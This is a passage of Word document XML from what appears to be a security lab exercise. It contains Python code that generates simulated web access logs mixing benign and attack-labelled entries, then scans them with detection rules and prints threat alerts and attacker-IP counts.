        <w:t>]</w:t>
        <w:br/>
        <w:br/>
        <w:t>benign_agents = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Mozilla/5.0 (X11; Linux x86_64)"</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
        <w:br/>
        <w:t>base_time = datetime.now() - timedelta(minutes=30)</w:t>
        <w:br/>
        <w:br/>
        <w:t>with open(output_file, "w") as f:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for i in range(count):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        is_attack = random.random() &lt; 0.4  # 40% chance of threat simulation</w:t>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
        <w:br/>
        <w:t xml:space="preserve">        if is_attack:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            ip = random.choice(attacker_ips)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            path, agent = random.choice(attack_payloads)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            status = random.choice([200, 403, 401])</w:t>
        <w:br/>
        <w:t xml:space="preserve">        else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            ip = random.choice(benign_ips)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            path = random.choice(benign_paths)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            agent = random.choice(benign_agents)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            status = 200</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        timestamp = (base_time + timedelta(seconds=i * 15)).strftime("%d/%b/%Y:%H:%M:%S +0000")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        log_entry = f'{ip} - - [{timestamp}] "GET {path} HTTP/1.1" {status} 2048 "-" "{agent}"\n'</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.write(log_entry)</w:t>
        <w:br/>
        <w:br/>
        <w:t>print(f"[+] Generated {count} simulated log lines in '{output_file}'\n")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DETECTION &amp; ANALYSIS ENGINE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def analyze_logs(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"""Parses access.log line-by-line and applies threat detection signatures."""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:shd w:val="clear" w:fill="E1E1E1"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>total_logs = 0</w:t>
        <w:br/>
        <w:t>threats_found = 0</w:t>
        <w:br/>
        <w:t>attacker_stats = {}</w:t>
        <w:br/>
        <w:br/>
        <w:t>print(f"{'='*85}")</w:t>
        <w:br/>
        <w:t>print(f"{'TIMESTAMP':&lt;22} | {'SOURCE IP':&lt;15} | {'ATTACK CATEGORY':&lt;30} | {'STATUS'}")</w:t>
        <w:br/>
        <w:t>print(f"{'='*85}")</w:t>
        <w:br/>
        <w:br/>
        <w:t>with open(file_path, 'r') as f:</w:t>
        <w:br/>
        <w:t xml:space="preserve"> for line in f:</w:t>
        <w:br/>
        <w:t xml:space="preserve"> total_logs += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve"> match = LOG_PATTERN.match(line)</w:t>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
        <w:br/>
        <w:t xml:space="preserve"> if match:</w:t>
        <w:br/>
        <w:t xml:space="preserve"> data = match.groupdict()</w:t>
        <w:br/>
        <w:t xml:space="preserve"> url = data['url']</w:t>
        <w:br/>
        <w:t xml:space="preserve"> agent = data['agent']</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ip = data['ip']</w:t>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
        <w:br/>
        <w:t xml:space="preserve"> # Check line against each detection rule</w:t>
        <w:br/>
        <w:t xml:space="preserve">            detected_attacks = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">            for attack_type, regex in SUSPICIOUS_RULES.items():</w:t>
        <w:br/>
        <w:t xml:space="preserve">                if regex.search(url) or regex.search(agent):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    detected_attacks.append(attack_type)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">            if detected_attacks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                threats_found += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">                attacker_stats[ip] = attacker_stats.get(ip, 0) + 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
        <w:br/>
        <w:t xml:space="preserve">                # Output alert for matched threats</w:t>
        <w:br/>
        <w:t xml:space="preserve">                category_str = ", ".join(detected_attacks)</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print(f"{data['time']:&lt;22} | {ip:&lt;15} | {category_str:&lt;30} | {data['status']}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print(f"  └─ Payload/URI: {url}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print(f"  └─ User-Agent : {agent}\n")</w:t>
        <w:br/>
        <w:br/>
        <w:t># Metrics Summary</w:t>
        <w:br/>
        <w:t>print(f"{'='*85}")</w:t>
        <w:br/>
        <w:t>print(f"SUMMARY: Analyzed {total_logs} entries | Threats Detected: {threats_found}")</w:t>
        <w:br/>
        <w:t>print(f"Top Attacker IPs: {dict(sorted(attacker_stats.items(), key=lambda x: x[1], reverse=True))}")</w:t>
        <w:br/>
        <w:t>print(f"{'='*85}\n")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Execution - </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>": </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># Step 1: Generate sample access.log generate_simulated_logs("access.log", count=30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:shd w:val="clear" w:fill="E1E1E1"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># Step 2: Detect suspicious patterns in access.log</w:t>
        <w:br/>
        <w:t>analyze_logs("access.log")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans"/>
        </w:rPr>
        <w:t>Note – access.log is a file to store web detection logs.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440" w:right="1440" w:gutter="0" w:header="576" w:top="1440" w:footer="432" w:bottom="1440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swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Google Sans">
    <w:altName w:val="sans-serif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0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1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114300" distB="114300" distL="114300" distR="11430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-365760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7560310" cy="1023620"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom/>
          <wp:docPr id="8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114300" distB="114300" distL="114300" distR="11430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-365760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7560310" cy="1023620"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom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b460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b4604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LibreOffice/26.2.4.2$Linux_X86_64 LibreOffice_project/620$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>26</Pages>
  <Words>3010</Words>
  <Characters>25530</Characters>
  <CharactersWithSpaces>30748</CharactersWithSpaces>
  <Paragraphs>585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2025-07-21T00:34:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-23T22:35:01Z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